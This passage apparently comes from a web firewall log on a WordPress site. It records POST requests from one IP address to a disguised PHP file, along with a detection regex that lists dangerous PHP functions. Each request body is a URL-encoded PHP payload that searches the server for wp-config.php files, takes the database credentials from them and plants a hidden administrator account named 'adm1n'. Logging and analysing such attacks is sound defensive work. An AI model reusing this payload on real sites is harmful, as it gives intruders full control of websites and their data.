20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 06:05:53","213.209.159.254","POST","\/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> KT:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php HTTP\/1.1\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncookie:4=16a08a6222d8eba60e9d2af882976b3e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvF1DvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYz11oUEcVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"100\", \"Google Chrome\";v=\"100\"\ncontent-type:application\/x-www-form-urlencoded\nsec-ch-ua-mobile:?0\ncontent-length:12640\n\nKT=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix